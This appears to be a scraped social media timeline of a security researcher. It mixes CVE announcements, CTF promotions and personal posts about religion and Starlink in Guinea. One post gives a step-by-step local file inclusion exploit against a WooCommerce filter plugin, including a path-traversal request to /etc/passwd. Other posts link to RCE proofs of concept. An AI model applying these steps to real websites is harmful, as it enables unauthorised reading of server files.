Mamadou Abdoulaye

CVE-2026-26215 - Unauthenticated RCE in manga-image-translator (9.3k stars) Two FastAPI endpoints call pickle.loads() on raw HTTP bodies. Auth exists but defaults to an empty string, which is falsy in Python, so the check never runs. First reported by sud0why in May 2025, auto-closed by a stale bot. Still unpatched. chocapikk.com/posts/2026/man…

@elonmusk we need this one 🥲😅 #humor #meme

Hello X @hackthebox_eu #htb #cwes

This is more than a session; it’s a front-row seat to real pro hacking techniques! Save the Dates: 30th August – Mallam Challenge discord.com/events/1278784… 6th September – Ifowosowopo Challenge discord.com/events/1278784… Don’t miss out. Come. Learn. Level up. #AfriHackBox #CTF

Hello Hunters 😅 #bugbounty #hackers

@Secfortress Bruh just delete free fire and install PUBG Mobile 😏😶‍🌫️

People should just do what they like bruhh, If you ask me, Am i a Christian, I would tell you yes but i clearly read the bible and the quran and it gives me peace bruhh…..

The amount of Alhamdulilah i say in a day whole heartedly is more than any word that has come out of my mouth bruhh…… I no really famz church oo, but anything Godliness, that put me in a position of peace, I would be there bruhh… The whole religion P on my TL…

Hello guys, I've already talked about WPProbe, my tool to fingerprint WordPress through its REST API. This time, I'm sharing some behind-the-scenes: the idea behind it, and a few struggles I had along the way. Not that complex, but worth the effort. 📝 chocapikk.com/posts/2025/wpp…

@Chocapikk_ wallah c vré 😅

Finally found an unauthenticated RCE for 2025. (No joke, took only 5 minutes to find.) Exploit confirmed & session obtained.

@wgujjer11 Authenticated or not

WooCommerce plugin allows LFI! 🍃 02: Capture request in Burp 03: Change request method to POST and add: POST /wp-admin/admin-ajax.php?template=../../../../../../../etc/passwd&value=a&min_symbols=1 04: Also add: action=woof_text_search& 05: That’s it! You got local files.

@Chocapikk_ @leak_ix Script Kiddie(Me): I want this right Now 🤧🚶‍♀️

900+ WordPress plugins just casually leak their presence. No bruteforce, no guessing, just a simple request. Wild. Haven't seen anyone using this for recon yet. 🤔 Soon. cc: @leak_ix

@sarperavci 0xabdoulaye.github.io

You can send your website to me if it's not listed there

Just launched CTF Search with 24k+ CTF writeups, covering everything from web exploitation to reverse engineering. Check it out! ctfsearch.hackmap.win

@Itx_Shad0w Show us

🙈

🚨 [CVE-2024-56145] Exploit released! 🚨 I’ve successfully reproduced the Craft CMS RCE vulnerability, thanks to the outstanding research by @Assetnote. Details, PoC, and setup instructions: 🔗 github.com/Chocapikk/CVE-… Learn more: 📖 assetnote.io/resources/rese… 🙏 Huge thanks to Assetnote for this amazing work! 🙌

@ConsulofGuinea @AlBah65474875 @Starlink Vraiment on veux ça en Guinée

@AlBah65474875 @Starlink Pas encore

Starlink Mini est désormais disponible en Belgique ! Commandez-le en ligne en moins de 2 minutes

@doddsie @Starlink Hello i am in Guinea, Can I test the starlink internet please 🥺 it will be a pleasure

🇬🇳 Guinea @Starlink ✖️ No service Geoblocked at the border was a huge bummer, especially later in the night with no cell service. Woke up in my tent the following morning to chants of “Prooooo Government”. Many stories about Guinea, not on my recommendation list for prospective travellers.

@Chocapikk_ @Blaklis_ @7h3h4ckv157 @TheLaluka @NahamSec @GodfatherOrwa 😂😂

@bloman19 @Blaklis_ @7h3h4ckv157 @TheLaluka @NahamSec @GodfatherOrwa No absolutely not IMHO, it's a sandbox. Try to escape the sandbox haha

@TheLaluka @Chocapikk_ @Blaklis_ @7h3h4ckv157 @NahamSec @GodfatherOrwa Thanks. I am just a baby Hacker 🫡

FFS it's written "sandbox", of course it's a real shell, bug, and RCE! 🤯 Go report it as fast as you can you young fellow hacker! 💌 (Nope, it's not, sorry... But do refrain from mass-tagging for such findings, a gentle DM or ping to one person is often way more than enough... 🙏)

exploit + lab setup for CVE-2024-45519 github.com/Chocapikk/CVE-…

@Blaklis_ Cool. Je vais faire vite alors

@bloman19 Oui, juste une

Today challenge is to read the /flag.txt file - top 3 will get $50 each :) http://52.0.228.201/?source=1 Don't comment with the solution; DM me if you get the flag with the solution! Solve it locally then remotely please! :) #blaklisctf #bugbounty

@Blaklis_ Okay. Est-ce qu'il reste toujours une place pour celui qui solve le chall ?

@bloman19 Nop, it will go to an official charity :)